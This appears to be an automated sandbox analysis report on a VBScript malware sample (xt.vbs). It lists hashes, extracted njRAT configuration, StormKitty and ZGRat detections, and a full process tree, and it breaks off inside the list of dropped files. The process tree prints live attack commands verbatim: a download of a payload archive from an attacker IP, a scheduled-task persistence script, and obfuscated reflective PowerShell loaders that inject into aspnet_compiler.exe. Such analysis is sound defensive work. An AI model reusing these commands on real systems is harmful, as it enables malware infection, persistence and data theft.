Analysis

  • max time kernel
    600s
  • max time network
    594s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-03-2024 19:06

General

  • Target

    xt.vbs

  • Size

    728B

  • MD5

    617b93b01b88973de9237d3115c73b7a

  • SHA1

    2b17b017b3b552d0d0744810a8b50420baf847d1

  • SHA256

    45c1e9101141f68101337cd553cbdfdbb5d752423c350df39aab343d4312663b

  • SHA512

    458c8c1239f88a19b83c5c370e7bf87efd4d57abc2a406e1ec5f6edabb95b6f644c384cc9669710529faf90e5c03890f7bb7e7a5a6a098d1e5b9fdca254c6d77

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.80.158.168:222/x.jpg

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://nodejs.org/download/release/latest-v19.x/win-x64/node.exe

Extracted

Family

njrat

Version

Platinum

Botnet

HacKed By Ms47

C2

127.0.0.1:1177

Mutex

Client.exe

Attributes
  • reg_key

    Client.exe

  • splitter

    |Ghost|

Signatures

  • Detect ZGRat V1 1 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xt.vbs"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:508
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://45.80.158.168:222/x.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2388
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\basta.js"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4652
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" C:\Users\Public\"
        3⤵
        • Checks computer location settings
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:2456
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/latest-v19.x/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1440
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1616
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4940
          • C:\Users\Public\node.exe
            "C:\Users\Public\node.exe" C:\Users\Public\run.js
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2616
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3356
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
                7⤵
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:5008
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  8⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2572
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Public\open.js"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4772
          • C:\Users\Public\node.exe
            "C:\Users\Public\node.exe" C:\Users\Public\get.js
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:5060
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); ""
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1584
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); "
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:592
          • C:\Users\Public\node.exe
            "C:\Users\Public\node.exe" C:\Users\Public\get.js
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3136
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); ""
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2308
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); "
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:760
  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1660
    • C:\Users\Public\node.exe
      "C:\Users\Public\node.exe" C:\Users\Public\run.js
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2056
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:880
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3556
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            5⤵
              PID:4408
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3644
      • C:\Users\Public\node.exe
        "C:\Users\Public\node.exe" C:\Users\Public\run.js
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2768
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1060
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
            4⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1452
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              5⤵
                PID:1380
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                5⤵
                  PID:2320
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
          1⤵
            PID:1460
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k UnistackSvcGroup
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2308
          • C:\Windows\System32\WScript.exe
            C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
            1⤵
            • Checks computer location settings
            PID:3212
            • C:\Users\Public\node.exe
              "C:\Users\Public\node.exe" C:\Users\Public\run.js
              2⤵
                PID:2800
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
                  3⤵
                    PID:1408
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
                      4⤵
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4984
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                        5⤵
                          PID:4092
                • C:\Windows\System32\WScript.exe
                  C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
                  1⤵
                    PID:5028

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                    Filesize

                    3KB

                    MD5

                    e5ab5d093e49058a43f45f317b401e68

                    SHA1

                    120da069a87aa9507d2b66c07e368753d3061c2d

                    SHA256

                    4ec6d8e92ffc5b2a0db420e2d031a2226eef582d5e56d5088fc91bba77288e74

                    SHA512

                    d44361457713abd28c49f9aa4043b76882e2b5e626816267cf3d79454c48980ba6207333f23b7976b714e090c658db36a844cb27cd6a91615014f3b06ef5623a

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    2KB

                    MD5

                    176e06d925350cd4e4fe35470be810d9

                    SHA1

                    60e4033d866f64faa490dad93552ec221a7c3db9

                    SHA256

                    1db23e1c00caceb52423a6e78b3923eb6cbde8fc9c5ca86ae88b717a433ddbb4

                    SHA512

                    6f661ba92185d85329b119944ec5098bb0b05d2c00ed3353b5a21639caef921033634706083fe7b7a8d09a65d71b7f4e9d07b4f33740a30d38ef6b7fc21d50b1

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_31ocissr.o4q.ps1

                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  • C:\Users\Admin\AppData\Local\Temp\places.raw

                    Filesize

                    5.0MB

                    MD5

                    c8f29f611fe42033da4bde2dc431819e

                    SHA1

                    8177371d7093bbb01ccbd9c382497c3261808dbd

                    SHA256

                    6f7cdb109be8bdf25a97b0088e8d5e7ae52aa484500a6875f81dae7c91a2e6a8

                    SHA512

                    cee0c8eb7edb91973f59c89f86706ed153bdeb6fb6cacd4ddb41553b79798b66bc0c0f5a0f502026cab8c09748cea5adc1e91d8c5e2ad4a5c02d5a7e3aaf6b16

                  • C:\Users\Admin\AppData\Local\Temp\tmp3109.tmp.dat

                    Filesize

                    92KB

                    MD5

                    dcbcc5168ee247e51677b17c3e3650bb

                    SHA1

                    50556e795d94d737190b800f4ca52b6ada9ff10b

                    SHA256

                    8ea7842c9d2568004ad984a286aa62b6ff787ece4b6287167223f5f875496ea3

                    SHA512

                    4b6968d5596235c9826c2461197ef5e347f12aac333ec5a03ceb3b1b6cad0e1e39cc59ddda889f8b938999a47f5d17155443ff79974df3559bca42884dc960a0

                  • C:\Users\Admin\AppData\Local\Temp\tmp313F.tmp.dat

                    Filesize

                    116KB

                    MD5

                    f70aa3fa04f0536280f872ad17973c3d

                    SHA1

                    50a7b889329a92de1b272d0ecf5fce87395d3123

                    SHA256

                    8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

                    SHA512

                    30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

                  • C:\Users\Public\app.js

                    Filesize

                    373B

                    MD5

                    3f5daf5315fe8b83fdc8a6d0265008b6

                    SHA1

                    4a08dd25e8fbb547c23e888e3dd009910cdc3cc5

                    SHA256

                    46286370fb97d1b63b3b9ee3b79e8bb0b5072d6e17d11470592e1e0d8586e0c6

                    SHA512

                    93f2700a5e7d5e4b9da7aeb470d261f38a76a54f2bfeb08657bfc5a8f05ce3d583dda2790e441e62acc5de9594fe745f3ae0a6de74564776978c88aadeee86f8

                  • C:\Users\Public\basta.js

                    Filesize

                    377B

                    MD5

                    38affda935585ad2ddc0abe0a906f404

                    SHA1

                    8379070ec3e9b448499c53c6244c815bc566cf59

                    SHA256

                    f1c6fbb11607690d7de83308bb65b7fdd0679591c2fc5bc927820b654a483eaa

                    SHA512

                    0520a8d53a2bc686a87c530680afa2f12eab198316e3d7419f472515bac0b0d2a3c891b0e4f3112b1f382d799f4655aa06624c57f06c2bc1cc3161ff06aeced6

                  • C:\Users\Public\get.js

                    Filesize

                    10KB

                    MD5

                    e2bc3600ad058e027ace3294ce01586d

                    SHA1

                    292aa8885f06a5ceeab9178db111f5f490e7f70b

                    SHA256

                    89bc4198cca19c7caa04186e8209223aa0b56efeac5fbb9235bbdb889cf69297

                    SHA512

                    971a1fe6f03060e95c56556942f5d70043f30992e40105b742af0cbbef0ad51096fc35e529dfd518ce5ffe7678771dfd9792868b1f37dcc9af34e598675f4e46

                  • C:\Users\Public\node.bat

                    Filesize

                    3KB

                    MD5

                    1beb518fe0cd85f2d6f9101c2e47c7ae

                    SHA1

                    65ab6ae5b983633f60a4404636c0de19b2c529fa

                    SHA256

                    81ae13af20a68b407c4171c498f5140f51d8f0d9cf5bf4ddcf989112e3d31297

                    SHA512

                    880534df1232044cf1cfd5dc83a3d170eac46093c8f38b19e20967cb6b2c5020994d1f3113e72a4e73917ae6f9701c4a08f57f8ebec2471e35a9111362115d5b

                  • C:\Users\Public\node_modules\archiver-utils\index.js

                    Filesize

                    3KB

                    MD5

                    b4a265502b7b635e62112be2e578af72

                    SHA1

